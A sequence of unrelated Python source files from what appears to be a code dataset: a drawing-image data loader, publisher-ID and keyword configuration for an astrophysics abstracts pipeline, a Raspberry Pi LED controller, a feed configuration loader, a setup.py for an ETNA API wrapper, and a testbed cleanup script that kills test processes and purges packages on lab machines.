return len(self.df)
def load_img(self, df_row):
img = draw_cv2(df_row.drawing)
#print(df_row.drawing)
if self.img_sz != 256:
img = cv2.resize(img, (self.img_sz, self.img_sz))
img = (img / 255.).astype(np.float32)
country_code_channel = np.zeros_like(img).astype(np.float32)
country_code_channel.fill(get_country_code(df_row))
mean=[0.485, 0.456, 0.406]
std=[0.229, 0.224, 0.225]
#img = np.stack([(img-mean[0])/std[0], (img-mean[1])/std[1], country_code_channel])
img = np.stack([(img-mean[0])/std[0], (img-mean[1])/std[1], (img-mean[2])/std[2]])
return img
def get_train_loader(train_index, batch_size=4, img_sz=256, dev_mode=False, workers=8):
df = get_train_meta(index=train_index, dev_mode=dev_mode)
if dev_mode:
df = df.iloc[:10]
dset = ImageDataset(df, img_transform=train_transforms, img_sz=img_sz)
dloader = data.DataLoader(dset, batch_size=batch_size, shuffle=True, num_workers=workers, drop_last=True)
dloader.num = len(dset)
return dloader
def get_val_loader(val_num=50, batch_size=4, img_sz=256, dev_mode=False, workers=8):
df = get_val_meta(val_num=val_num)
if dev_mode:
df = df.iloc[:10]
dset = ImageDataset(df, img_transform=None, img_sz=img_sz)
dloader = data.DataLoader(dset, batch_size=batch_size, shuffle=False, num_workers=workers, drop_last=False)
dloader.num = len(dset)
return dloader
def get_test_loader(batch_size=256, img_sz=256, dev_mode=False, tta_index=0, workers=8):
#test_df = pd.read_csv(settings.SAMPLE_SUBMISSION, dtype={'key_id': np.str})
test_df = pd.read_csv(settings.TEST_SIMPLIFIED)
if dev_mode:
test_df = test_df.iloc[:10]
test_df['drawing'] = test_df['drawing'].apply(json.loads)
#img_dir = settings.TEST_SIMPLIFIED_IMG_DIR
#print(test_df.head())
dset = ImageDataset(test_df, has_label=False, img_transform=get_tta_transform(tta_index), img_sz=img_sz)
dloader = data.DataLoader(dset, batch_size=batch_size, shuffle=False, num_workers=workers, drop_last=False)
dloader.num = len(dset)
dloader.meta = test_df
return dloader
def test_train_loader():
loader = get_train_loader(0, batch_size=100, dev_mode=False)
for i, (img, target) in enumerate(loader):
#print(img.size(), target)
#print(img)
if i % 1000 == 0:
print(i)
def test_val_loader():
loader = get_val_loader()
for img, target in loader:
print(img.size(), target)
print(torch.max(img), torch.min(img))
def test_test_loader():
loader = get_test_loader(dev_mode=True, tta_index=1)
print(loader.num)
for img in loader:
print(img.size())
if __name__ == '__main__':
#test_train_loader()
#test_val_loader()
test_test_loader()
| StarcoderdataPython |
3244140 | import os
import json
import requests
def get_uat(data,data_dict):
if isinstance(data,dict):
try:
data_dict[data['name'].strip()] = data['uri'].strip().split('/')[-1]
except:
pass
try:
data['children']
except:
pass
else:
get_uat(data['children'],data_dict)
elif isinstance(data,list):
for n in data:
get_uat(n,data_dict)
MONTH_TO_NUMBER = {'jan': 1, 'feb': 2, 'mar': 3, 'apr': 4, 'may': 5, 'jun': 6,
'jul': 7, 'aug': 8, 'sep': 9, 'oct': 10, 'nov': 11,
'dec': 12}
# APS Journal dictionary: used by parsers/aps.py to get the bibstem
APS_PUBLISHER_IDS = {'PRL': 'PhRvL', 'PRX': 'PhRvX', 'RMP': 'RvMP',
'PRA': 'PhRvA', 'PRB': 'PhRvB', 'PRC': 'PhRvC',
'PRD': 'PhRvD', 'PRE': 'PhRvE', 'PRAB': 'PhRvS',
'PRSTAB': 'PhRvS', 'PRAPPLIED': 'PhRvP',
'PRFLUIDS': 'PhRvF', 'PRMATERIALS': 'PhRvM',
'PRPER': 'PRPER', 'PRSTPER': 'PRSTP', 'PR': 'PhRv',
'PRI': 'PhRvI', 'PHYSICS': 'PhyOJ',
'PRResearch': 'PhRvR'}
IOP_PUBLISHER_IDS = {'apj': u'ApJ', 'jcap': u'JCAP', 'ejp': u'EJPh',
'raa': u'RAA', 'pmea': u'PhyM', 'd': u'JPhD',
'aj': u'AJ', 'apex': u'APExp', 'apjl': u'ApJL',
'apjs': u'ApJS', 'bb': u'BiBi', 'bf': u'BioFa',
'bmm': u'BioMa', 'cqg': u'CQGra', 'cpc': u'ChPhC',
'ctp': u'CoTPh', 'epl': u'EL', 'erc': u'ERCom',
'erx': u'ERExp', 'erl': u'ERL', 'est': u'EleSt',
'fcs': u'FCS', 'fdr': u'FlDyR', 'izv': u'IzMat',
'jbr': u'JBR', 'jopt': u'JOpt', 'cm': u'JPCM',
'jpenergy': u'JPEn', 'a': u'JPhA', 'b': u'JPhB',
'jpco': u'JPhCo', 'jpcomplex': u'JPCom',
'iopsn': u'IOPSN', 'g': u'JPhG', 'jpmater': u'JPhM',
'jpphoton': u'JPhP', 'lpl': u'LaPhL', 'mrx': u'MRE',
'mst': u'MeScT', 'mfm': u'MuMat', 'nanoe': u'NanoE',
'njp': u'NJPh', 'nanof': u'NanoF', 'nano': u'Nanot',
'non': u'Nonli', 'pasp': u'PASP', 'met': u'Metro',
'pmb': u'PMB', 'ppcf': u'PPCF', 'prex': u'PRCom',
'ps': u'PhyS', 'ped': u'PhyEd', 'psj': u'PSJ',
'phu': u'PhyU', 'pst': u'PlST', 'prge': u'PrEne',
'rnaas': u'RNAAS', 'rop': u'RPPh', 'rms': u'RuMaS',
'sst': u'SeScT', 'sust': u'SuScT', 'tdm': u'TDM',
'rcr': u'RuCRv', 'nf': u'NucFu', 'jmm': u'JMiMi',
'cpl': u'ChPhL', 'ip': u'InvPr', 'jrp': u'JRP',
'psst': u'PSST', 'sms': u'SMaS', 'msms': u'MSMSE',
'qel': u'QuEle', 'msb': u'SbMat', 'jjap': u'JaJAP',
'ansn': u'ANSNN', 'maf': u'MApFl', 'stmp': u'SuTMP',
'qst': u'QS&T', 'ees': u'E&ES', 'mse': u'MS&E',
'pb': u'PhBio', 'lp': u'LaPhy', 'cpb': u'ChPhB',
'jos': u'JSemi', 'jne': u'JNEng', 'jge': u'JGE',
'jstat': u'JSMTE', 'jpcs': u'JPhCS', 'pw': u'PhyW',
'prv': u'PPS', 'c': 'JPhC', 'jphf': 'JPhF',
'ecst': u'ECSTR', 'jinst': u'JInst', 'nanox': u'NanoE'}
IOP_JOURNAL_NAMES = {'rnaas': u'Research Notes of the American Astronomical Society'}
# IOP_SPECIAL_ID_HANDLING = ['PASP.','QuEle','JGE..','PhyU.','IzMat','SbMat',
# 'RuMaS','RuCRv','EL...','Nonli','JRP..']
IOP_SPECIAL_ID_HANDLING = ['PASP.']
OUP_PUBLISHER_IDS = {'mnras': u'MNRAS', 'mnrasl': u'MNRAS',
'pasj': u'PASJ', 'ptep': u'PTEP', 'gji': u'GeoJI'}
OUP_PDFDIR = 'https://academic.oup.com'
OUP_TMP_DIRS = {
'mnrasl': '/proj/ads/abstracts/config/links//DOI/MNRASL',
'mnras': '/proj/ads/abstracts/config/links//DOI/MNRAS',
'pasj.': '/proj/ads/abstracts/config/links//DOI/PASJ',
'geoji': '/proj/ads/abstracts/config/links//DOI/GeoJI'
}
AIP_PUBLISHER_IDS = {'AAIDBI': u'AIPA', 'APCPCS': u'AIPC', 'APPLAB': u'ApPhL',
'aipa': u'AIPA', 'apc': u'AIPC', 'apl': u'APL',
'AMPADS': u'APLM', 'APPHD2': u'APLP', 'AQSVAT': u'AVSQS',
'apm': u'APLM', 'app': u'APLP', 'aqs': u'AVSQS',
'AJPIAS': u'AmJPh', 'APRPG5': u'ApPRv', 'CHAOEH': u'Chaos',
'ajp': u'AmJPh', 'are': u'ApPRv', 'cha': u'Chaos',
'JAPIAU': u'JAP', 'JCPSA6': u'JChPh', 'JMAPAQ': u'JMP',
'jap': u'JAP', 'jcp': u'JChPh', 'jmp': u'JMP',
'JPCRBU': u'JPCRD', 'LTPHEG': u'LTP', 'PHFLE6': u'PhFl',
'jpr': u'JPCRD', 'ltp': u'LTP', 'phl': u'PhFl',
'PHPAEN': u'PhPl', 'PHTEAH': u'PhTea', 'RSINAK': u'RScI',
'php': u'PhPl', 'pte': u'PhTea', 'rsi': u'RScI'}
JATS_TAGS_DANGER = ['php', 'script', 'css']
JATS_TAGS_MATH = ['inline-formula',
'tex-math',
'sc',
'mml:math',
'mml:semantics',
'mml:mrow',
'mml:munder',
'mml:mo',
'mml:mi',
'mml:msub',
'mml:mover',
'mml:mn',
'mml:annotation'
]
JATS_TAGS_HTML = ['sub', 'sup', 'a', 'astrobj']
JATS_TAGSET = {'title': JATS_TAGS_MATH + JATS_TAGS_HTML,
'abstract': JATS_TAGS_MATH + JATS_TAGS_HTML + ['pre', 'br'],
'comments': JATS_TAGS_MATH + JATS_TAGS_HTML + ['pre', 'br'],
'affiliations': ['email', 'orcid'],
'keywords': ['astrobj']
}
# KEYWORDS
# Unified Astronomy Thesaurus
# retrieve current UAT from github
UAT_URL = 'https://raw.githubusercontent.com/astrothesaurus/UAT/master/UAT.json'
UAT_ASTRO_URI_DICT = dict()
try:
uat_request = requests.get(UAT_URL)
uat_data = uat_request.json()
get_uat(uat_request.json(), UAT_ASTRO_URI_DICT)
UAT_ASTRO_KEYWORDS = UAT_ASTRO_URI_DICT.keys()
UAT_ASTRO_URI_DICT = dict((k.lower(),v) for k,v in UAT_ASTRO_URI_DICT.items())
except Exception as e:
print("Warning: could not load UAT from github!")
UAT_ASTRO_KEYWORDS = list()
# American Physical Society keywords
APS_ASTRO_KEYWORDS_FILE = os.path.dirname(os.path.abspath(__file__)) + '/kw_aps_astro.dat'
APS_ASTRO_KEYWORDS = []
try:
with open(APS_ASTRO_KEYWORDS_FILE, 'rU') as fk:
for l in fk.readlines():
APS_ASTRO_KEYWORDS.append(l.strip())
except Exception as e:
print("Error loading APS Astro keywords: %s" % e)
# American Astronomical Society keywords (superseded June 2019 by UAT)
AAS_ASTRO_KEYWORDS_FILE = os.path.dirname(os.path.abspath(__file__)) + '/kw_aas_astro.dat'
AAS_ASTRO_KEYWORDS = []
try:
with open(AAS_ASTRO_KEYWORDS_FILE, 'rU') as fk:
for l in fk.readlines():
AAS_ASTRO_KEYWORDS.append(l.strip())
except Exception as e:
print("Error loading AAS Astro keywords: %s" % e)
# COMBINE ALL ASTRO KEYWORDS INTO AST_WORDS -- used by dbfromkw
AST_WORDS = UAT_ASTRO_KEYWORDS + APS_ASTRO_KEYWORDS + AAS_ASTRO_KEYWORDS
# REFERENCE SOURCE OUTPUT
REFERENCE_TOPDIR = '/proj/ads/references/sources/'
# REFSOURCE DICTIONARY
REFSOURCE_DICT = {
'iop': 'iopft.xml',
'oup': 'oupft.xml',
'pnas': 'pnas.xml'
}
# AUTHOR ALIASES
AUTHOR_ALIAS_DIR = '/proj/ads/abstracts/config/Authors/'
# HTML_ENTITY_TABLE
HTML_ENTITY_TABLE = os.path.dirname(os.path.abspath(__file__)) + '/html5.dat'
ENTITY_DICTIONARY = dict()
try:
with open(HTML_ENTITY_TABLE, 'rU') as fent:
for l in fent.readlines():
carr = l.rstrip().split('\t')
UNI_ENTITY = None
NAME_ENTITY = None
HEX_ENTITY = None
DEC_ENTITY = None
if len(carr) >= 4:
UNI_ENTITY = carr[0]
NAME_ENTITY = carr[1]
HEX_ENTITY = carr[2].lower()
DEC_ENTITY = carr[3].lower()
for c in NAME_ENTITY.strip().split():
try:
ENTITY_DICTIONARY[c.strip()] = DEC_ENTITY.strip()
except Exception as e:
print("Error splitting NAME_ENTITY: '%s'" % NAME_ENTITY)
ENTITY_DICTIONARY[UNI_ENTITY.strip()] = DEC_ENTITY.strip()
ENTITY_DICTIONARY[HEX_ENTITY.strip()] = DEC_ENTITY.strip()
else:
print("broken HTML entity:", l.rstrip())
NAME_ENTITY = "xxxxx"
except Exception as e:
print("Problem in config:", e)
# ADS-specific translations
# have been added to html5.txt
ENTITY_DICTIONARY['∼'] = "~"
ENTITY_DICTIONARY['∼'] = "~"
ENTITY_DICTIONARY['’'] = "'"
ENTITY_DICTIONARY['‘'] = "'"
ENTITY_DICTIONARY[' '] = " "
ENTITY_DICTIONARY['—'] = "-"
ENTITY_DICTIONARY['–'] = "-"
ENTITY_DICTIONARY['”'] = '"'
ENTITY_DICTIONARY['“'] = '"'
ENTITY_DICTIONARY['−'] = "-"
ENTITY_DICTIONARY['+'] = "+"
ENTITY_DICTIONARY[' '] = " "
ENTITY_DICTIONARY[' '] = " "
ENTITY_DICTIONARY[' '] = " "
ENTITY_DICTIONARY[' '] = " "
# ProQuest harvester
PROQUEST_BASE_PATH = "/proj/ads/abstracts/sources/ProQuest/fromProQuest/"
PROQUEST_OA_BASE = "http://pqdtopen.proquest.com/pubnum/%s.html"
PROQUEST_URL_BASE = "http://gateway.proquest.com/openurl?url_ver=Z39.88-2004&res_dat=xri:pqdiss&rft_val_fmt=info:ofi/fmt:kev:mtx:dissertation&rft_dat=xri:pqdiss:%s"
PROQUEST_DATASOURCE = "UMI"
PROQUEST_BIB_TO_PUBNUM_FILE = os.path.dirname(os.path.abspath(__file__)) + 'bibcode2pubno.dat'
PROQUEST_BIB_TO_PUBNUM = dict()
try:
result = map(lambda b: PROQUEST_BIB_TO_PUBNUM.update({b[0]:b[1]}),
map(lambda a: a.split(),
open(PROQUEST_BIB_TO_PUBNUM_FILE).read().strip().split('\n')))
except Exception, err:
pass
PROQUEST_TO_DB = {
"African American Studies":"GEN",
"Aeronomy":"PHY",
"Agriculture, Agronomy":"GEN",
"Agriculture, Animal Culture and Nutrition":"GEN",
"Agriculture, Fisheries and Aquaculture":"GEN",
"Agriculture, Food Science and Technology":"GEN",
"Agriculture, Forestry and Wildlife":"GEN",
"Agriculture, General":"GEN",
"Agriculture, Horticulture":"GEN",
"Agriculture, Plant Culture":"GEN",
"Agriculture, Plant Pathology":"GEN",
"Agriculture, Range Management":"GEN",
"Agriculture, Soil Science":"GEN",
"Agriculture, Wildlife Conservation":"GEN",
"Agriculture, Wood Technology":"GEN",
"Alternative Energy":"PHY",
"American Studies":"GEN",
"Anthropology, Archaeology":"GEN",
"Anthropology, Cultural":"GEN",
"Anthropology, Medical and Forensic":"GEN",
"Anthropology, Physical":"GEN",
"Applied Mathematics":"PHY",
"Applied Mechanics":"PHY",
"Architecture":"GEN",
"Area Planning and Development":"GEN",
"Art History":"GEN",
"Artificial Intelligence":"GEN",
"Atmospheric Chemistry":"PHY",
"Atmospheric Sciences":"PHY",
"Biogeochemistry":"GEN",
"Biography":"GEN",
"Biology, Anatomy":"GEN",
"Biology, Animal Physiology":"GEN",
"Biology, Bioinformatics":"GEN",
"Biology, Biostatistics":"GEN",
"Biology, Botany":"GEN",
"Biology, Cell":"GEN",
"Biology, Conservation":"GEN",
"Biology, Ecology":"GEN",
"Biology, Entomology":"GEN",
"Biology, General":"GEN",
"Biology, Genetics":"GEN",
"Biology, Landscape Ecology":"GEN",
"Biology, Limnology":"GEN",
"Biology, Microbiology":"GEN",
"Biology, Molecular":"GEN",
"Biology, Neurobiology":"GEN",
"Biology, Neuroscience":"GEN",
"Biology, Oceanography":"GEN",
"Biology, Physiology":"GEN",
"Biology, Plant Physiology":"GEN",
"Biology, Virology":"GEN",
"Biology, Zoology":"GEN",
"Biophysics, Biomechanics":"PHY",
"Biophysics, General":"PHY",
"Biophysics, Medical":"PHY",
"Black Studies":"GEN",
"Business Administration, Accounting":"GEN",
"Business Administration, Banking":"GEN",
"Business Administration, Entrepreneurship":"GEN",
"Business Administration, General":"GEN",
"Business Administration, Management":"GEN",
"Business Administration, Marketing":"GEN",
"Canadian Studies":"GEN",
"Chemical Oceanography":"PHY",
"Chemistry, Agricultural":"GEN",
"Chemistry, Analytical":"GEN",
"Chemistry, Biochemistry":"GEN",
"Chemistry, General":"GEN",
"Chemistry, Inorganic":"GEN",
"Chemistry, Molecular":"GEN",
"Chemistry, Nuclear":"GEN",
"Chemistry, Organic":"GEN",
"Chemistry, Pharmaceutical":"GEN",
"Chemistry, Physical":"GEN",
"Chemistry, Polymer":"GEN",
"Chemistry, Radiation":"GEN",
"Cinema":"GEN",
"Climate Change":"PHY",
"Computer Science":"GEN",
"Continental Dynamics":"PHY",
"Cultural Resources Management":"GEN",
"Design and Decorative Arts":"GEN",
"Economics, Agricultural":"GEN",
"Economics, Commerce-Business":"GEN",
"Economics, Environmental":"GEN",
"Economics, Finance":"GEN",
"Economics, General":"GEN",
"Economics, History":"GEN",
"Economics, Labor":"GEN",
"Economics, Theory":"GEN",
"Education, Administration":"EDU",
"Education, Adult and Continuing":"EDU",
"Education, Agricultural":"EDU",
"Education, Art":"EDU",
"Education, Bilingual and Multicultural":"EDU",
"Education, Business":"EDU",
"Education, Community College":"EDU",
"Education, Continuing":"EDU",
"Education, Curriculum and Instruction":"EDU",
"Education, Early Childhood":"EDU",
"Education, Educational Psychology":"EDU",
"Education, Elementary":"EDU",
"Education, English as a Second Language":"EDU",
"Education, Environmental":"EDU",
"Education, Evaluation":"EDU",
"Education, Finance":"EDU",
"Education, General":"EDU",
"Education, Gifted":"EDU",
"Education, Guidance and Counseling":"EDU",
"Education, Health":"EDU",
"Education, Higher":"EDU",
"Education, History of":"EDU",
"Education, Industrial":"EDU",
"Education, Instructional Design":"EDU",
"Education, Language and Literature":"EDU",
"Education, Leadership":"EDU",
"Education, Mathematics":"EDU",
"Education, Middle School":"EDU",
"Education, Multilingual":"EDU",
"Education, Music":"EDU",
"Education, Pedagogy":"EDU",
"Education, Philosophy of":"EDU",
"Education, Physical":"EDU",
"Education, Policy":"EDU",
"Education, Reading":"EDU",
"Education, Religious":"EDU",
"Education, Sciences":"EDU",
"Education, Secondary":"EDU",
"Education, Social Sciences":"EDU",
"Education, Sociology of":"EDU",
"Education, Special":"EDU",
"Education, Teacher Training":"EDU",
"Education, Technology of":"EDU",
"Education, Tests and Measurements":"EDU",
"Education, Vocational":"EDU",
"Energy":"PHY",
"Engineering, Aerospace":"PHY",
"Engineering, Agricultural":"PHY",
"Engineering, Architectural":"PHY",
"Engineering, Automotive":"PHY",
"Engineering, Biomedical":"PHY",
"Engineering, Chemical":"PHY",
"Engineering, Computer":"GEN",
"Engineering, Civil":"PHY",
"Engineering, Electronics and Electrical":"PHY",
"Engineering, Environmental":"PHY",
"Engineering, General":"PHY",
"Engineering, Geological":"PHY",
"Engineering, Geophysical":"PHY",
"Engineering, Industrial":"PHY",
"Engineering, Marine and Ocean":"PHY",
"Engineering, Materials Science":"PHY",
"Engineering, Mechanical":"PHY",
"Engineering, Metallurgy":"PHY",
"Engineering, Mining":"PHY",
"Engineering, Naval":"PHY",
"Engineering, Nuclear":"PHY",
"Engineering, Packaging":"PHY",
"Engineering, Petroleum":"PHY",
"Engineering, Robotics":"PHY",
"Engineering, Sanitary and Municipal":"PHY",
"Engineering, System Science":"PHY",
"Environmental Health":"GEN",
"Environmental Law":"GEN",
"Environmental Management":"GEN",
"Environmental Sciences":"PHY",
"Environmental Studies":"GEN",
"Ethics":"GEN",
"Fine Arts":"GEN",
"Gender Studies":"GEN",
"Geobiology":"PHY",
"Geochemistry":"PHY",
"Geodesy":"PHY",
"Geography":"PHY",
"Geological Survey":"PHY",
"Geology":"PHY",
"Geomorphology":"PHY",
"Geophysics":"PHY",
"Geotechnology":"PHY",
"Gerontology":"GEN",
"GLBT Studies":"GEN",
"Health Sciences, Audiology":"GEN",
"Health Sciences, Dentistry":"GEN",
"Health Sciences, Education":"EDU",
"Health Sciences, Epidemiology":"GEN",
"Health Sciences, General":"GEN",
"Health Sciences, Human Development":"GEN",
"Health Sciences, Immunology":"GEN",
"Health Sciences, Medicine and Surgery":"GEN",
"Health Sciences, Nursing":"GEN",
"Health Sciences, Nutrition":"GEN",
"Health Sciences, Obstetrics and Gynecology":"GEN",
"Health Sciences, Occupational Health and Safety":"GEN",
"Health Sciences, Oncology":"GEN",
"Health Sciences, Ophthalmology":"GEN",
"Health Sciences, Pathology":"GEN",
"Health Sciences, Pharmacology":"GEN",
"Health Sciences, Pharmacy":"GEN",
"Health Sciences, Public Health":"GEN",
"Health Sciences, Radiology":"GEN",
"Health Sciences, Recreation":"GEN",
"Health Sciences, Rehabilitation and Therapy":"GEN",
"Health Sciences, Speech Pathology":"GEN",
"Health Sciences, Surgery":"GEN",
"Health Sciences, Toxicology":"GEN",
"Hispanic American Studies":"GEN",
"History of Science":"GEN",
"History, African":"GEN",
"History, Ancient":"GEN",
"History, Asia, Australia and Oceania":"GEN",
"History, Black":"GEN",
"History, Canadian":"GEN",
"History, European":"GEN",
"History, Latin American":"GEN",
"History, Medieval":"GEN",
"History, Modern":"GEN",
"History, United States":"GEN",
"Home Economics":"GEN",
"Hydrology":"PHY",
"Information Science":"GEN",
"Information Technology":"GEN",
"Journalism":"GEN",
"Land Use Planning":"GEN",
"Landscape Architecture":"GEN",
"Language, General":"GEN",
"Language, Linguistics":"GEN",
"Language, Modern":"GEN",
"Language, Rhetoric and Composition":"GEN",
"Latin American Studies":"GEN",
"Law":"GEN",
"Library Science":"GEN",
"Literature, American":"GEN",
"Literature, Classical":"GEN",
"Literature, English":"GEN",
"Literature, Modern":"GEN",
"Marine Geology":"PHY",
"Mass Communications":"GEN",
"Mathematics":"PHY",
"Meteorology":"PHY",
"Military Studies":"GEN",
"Mineralogy":"PHY",
"Museology":"GEN",
"Music":"GEN",
"Nanoscience":"PHY",
"Nanotechnology":"PHY",
"Native American Studies":"GEN",
"Natural Resource Management":"GEN",
"Operations Research":"GEN",
"Paleobotany":"PHY",
"Paleoclimate Science":"GEN",
"Paleoecology":"PHY",
"Paleontology":"PHY",
"Palynology":"PHY",
"Petroleum Geology":"PHY",
"Petrology":"PHY",
"Philosophy":"GEN",
"Philosophy of Science":"GEN",
"Physical Geography":"PHY",
"Physical Oceanography":"PHY",
"Physics, Acoustics":"PHY",
"Physics, Astronomy and Astrophysics":"AST",
"Physics, Astrophysics":"AST",
"Physics, Atmospheric Science":"PHY",
"Physics, Atomic":"PHY",
"Physics, Condensed Matter":"PHY",
"Physics, Electricity and Magnetism":"PHY",
"Physics, Elementary Particles and High Energy":"PHY",
"Physics, Fluid and Plasma":"PHY",
"Physics, General":"PHY",
"Physics, High Temperature":"PHY",
"Physics, Low Temperature":"PHY",
"Physics, Molecular":"PHY",
"Physics, Nuclear":"PHY",
"Physics, Optics":"PHY",
"Physics, Quantum":"PHY",
"Physics, Radiation":"PHY",
"Physics, Solid State":"PHY",
"Physics, Theory":"PHY",
"Planetology":"AST",
"Plastics Technology":"PHY",
"Plate Tectonics":"PHY",
"Political Science, General":"GEN",
"Political Science, International Law and Relations":"GEN",
"Political Science, International Relations":"GEN",
"Political Science, Public Administration":"GEN",
"Psychology, Behavioral":"GEN",
"Psychology, Clinical":"GEN",
"Psychology, Cognitive":"GEN",
"Psychology, Counseling":"GEN",
"Psychology, Developmental":"GEN",
"Psychology, Experimental":"GEN",
"Psychology, General":"GEN",
"Psychology, Industrial":"GEN",
"Psychology, Personality":"GEN",
"Psychology, Physiological":"GEN",
"Psychology, Psychobiology":"GEN",
"Psychology, Psychometrics":"GEN",
"Psychology, Social":"GEN",
"Recreation":"GEN",
"Religion, Biblical Studies":"GEN",
"Religion, General":"GEN",
"Religion, History of":"GEN",
"Religion, Philosophy of":"GEN",
"Remote Sensing":"PHY",
"Sedimentary Geology":"PHY",
"Social Work":"GEN",
"Sociology, Criminology and Penology":"GEN",
"Sociology, Demography":"GEN",
"Sociology, Environmental Justice":"GEN",
"Sociology, Ethnic and Racial Studies":"GEN",
"Sociology, General":"GEN",
"Sociology, Individual and Family Studies":"GEN",
"Sociology, Industrial and Labor Relations":"GEN",
"Sociology, Organizational":"GEN",
"Sociology, Public and Social Welfare":"GEN",
"Sociology, Social Structure and Development":"GEN",
"Sociology, Sociolinguistics":"GEN",
"Sociology, Theory and Methods":"GEN",
"Speech Communication":"GEN",
"Statistics":"GEN",
"Sub Saharan Africa Studies":"GEN",
"Sustainability":"GEN",
"Textile Technology":"GEN",
"Theater":"GEN",
"Theology":"GEN",
"Theoretical Mathematics":"PHY",
"Transportation":"GEN",
"Urban and Regional Planning":"GEN",
"Water Resource Management":"PHY",
"Web Studies":"GEN",
"Women's Studies":"GEN",
}
| StarcoderdataPython |
1629924 | from gpiozero import LED
from time import sleep
import RPi.GPIO as GPIO
import time
class DisplayManager(object):
def __init__(self):
GPIO.setmode(GPIO.BOARD)
GPIO.setup(8, GPIO.OUT)
GPIO.setwarnings(False)
# Flash the LED logo at initialization
print("Init")
def DisplayLED(self, strImage):
print("Displaying " + strImage)
if 'bit' in strImage.lower():
GPIO.output(8, True)
print("On")
else:
GPIO.output(8, False)
print("Off") | StarcoderdataPython |
3361367 | <filename>mapping/gis/yoink/config_io.py
'''Loading and saving of Config objects.
'''
import ConfigParser
import datetime, logging, os
from ordereddict import OrderedDict
from .config import Config
from .feed import Feed
from .util import fullpath
logger = logging.getLogger('yoink.config_io')
def _make_feed(config, cp, section):
'''Construct a Feed object from the data in a feed: section of the
config.
'''
assert section.startswith('feed:')
# If the timestamp is not stored in the config file, then We
# construct the earliest timestamp that datetime.datetime.strftime
# will work with (for some reason it doesn't like years before
# 1900.)
try:
timestamp = cp.get(section, 'timestamp')
timestamp = datetime.datetime.strptime(
cp.get(section, 'timestamp'),
Feed.TIME_FORMAT)
if timestamp.year < 1900:
timestamp = datetime.datetime(1900, 1, 1)
except ConfigParser.NoOptionError:
timestamp = datetime.datetime(1900, 1, 1)
return Feed(
name=section,
url=cp.get(section, 'url'),
folder=fullpath(
os.path.join(
cp.get('config', 'folder'),
cp.get(section, 'folder'))),
timestamp=timestamp,
config=config)
class ConfigIO(object):
'''A context-manager for loading and saving Configs.
Generally just use this as a context-manager. Note that the value
bound in the with-statement when using a `ConfigIO` is a `Config`
object, not the ConfigIO. For example::
with ConfigIO(filename='my_config', preview=True) as config:
...
# On non-exceptional __exit__, the ConfigIO saves the config.
'''
def __init__(self, filename, preview=False):
self.config_file = fullpath(filename)
self.cp = ConfigParser.ConfigParser(dict_type=OrderedDict)
self.preview = preview
logger.info('loading config file: {0}'.format(self.config_file))
self.cp.read(self.config_file)
self.config = Config(preview)
# Make one Feed instance for each feed: section
for section in (s for s in self.cp.sections() if s.startswith('feed:')):
self.config.feeds.append(
_make_feed(
self.config, self.cp, section))
def add_feed(self, feed):
self.cp.add_section(feed.name)
self.cp.set(feed.name,
'url',
feed.url)
self.cp.set(feed.name,
'folder',
feed.folder)
self.cp.set(feed.name,
'timestamp',
feed.timestamp.strftime(Feed.TIME_FORMAT))
def save(self):
# clear old feeds
for section in (s for s in self.cp.sections() if s.startswith('feed:')):
self.cp.remove_section(section)
for feed in self.config.feeds:
self.add_feed(feed)
# Save the config.
with open(self.config_file, 'w') as f:
logger.info('writing config file: {0}'.format(self.config_file))
self.cp.write(f)
def __enter__(self):
return self.config
def __exit__(self, t, v, tb):
if not t: self.save() | StarcoderdataPython |
1687792 | import pathlib
from setuptools import setup
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="etnapy",
version="1.0.0",
author="<NAME>",
author_email="<EMAIL>",
description="A python wrapper around the ETNA School API",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/Astropilot/etnapy",
license='MIT',
packages=['etnapy'],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=["requests"],
)
| StarcoderdataPython |
3377985 | #!/usr/bin/env python
# Copyright (c) 2019 Cisco and/or its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This script provides cleanup routines on all DUTs."""
import argparse
import sys
from platform import dist
from yaml import load
from resources.libraries.python.ssh import SSH
def execute_command_ssh(ssh, cmd, sudo=False):
"""Execute a command over ssh channel, and print outputs.
:param ssh: SSH() object connected to a node.
:param cmd: Command line to execute on remote node.
:param sudo: Run command with sudo privilege level..
:type ssh: SSH() object
:type cmd: str
:type sudo: bool
:returns return_code, stdout, stderr
:rtype: tuple(int, str, str)
"""
if sudo:
ret, stdout, stderr = ssh.exec_command_sudo(cmd, timeout=60)
else:
ret, stdout, stderr = ssh.exec_command(cmd, timeout=60)
print 'Executing: {cmd}'.format(cmd=cmd)
print '({ret}) {stdout} {stderr}'.format(ret=ret, stdout=stdout,
stderr=stderr)
return ret, stdout, stdout
def uninstall_package(ssh, package):
"""If there are packages installed, clean them up.
:param ssh: SSH() object connected to a node.
:param package: Package name.
:type ssh: SSH() object
:type package: str
"""
if dist()[0] == 'Ubuntu':
ret, _, _ = ssh.exec_command("dpkg -l | grep {package}".format(
package=package))
if ret == 0:
# Try to fix interrupted installations first.
execute_command_ssh(ssh, 'dpkg --configure -a', sudo=True)
# Try to remove installed packages
execute_command_ssh(ssh, 'apt-get purge -y "{package}.*"'.format(
package=package), sudo=True)
def kill_process(ssh, process):
"""If there are running processes, kill them.
:param ssh: SSH() object connected to a node.
:param process: Process name.
:type ssh: SSH() object
:type process: str
"""
execute_command_ssh(ssh, 'killall -v -s 9 {process}'.format(
process=process), sudo=True)
def main():
"""Testbed cleanup."""
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--topo", required=True, help="Topology file")
args = parser.parse_args()
topology_file = args.topo
topology = load(open(topology_file).read())['nodes']
ssh = SSH()
for node in topology:
if topology[node]['type'] == "DUT":
print "###TI host: {}".format(topology[node]['host'])
ssh.connect(topology[node])
# Kill processes.
kill_process(ssh, 'qemu')
kill_process(ssh, 'l3fwd')
kill_process(ssh, 'testpmd')
# Uninstall packages
uninstall_package(ssh, 'vpp')
uninstall_package(ssh, 'honeycomb')
# Remove HC logs.
execute_command_ssh(ssh, 'rm -rf /var/log/honeycomb',
sudo=True)
# Kill all containers.
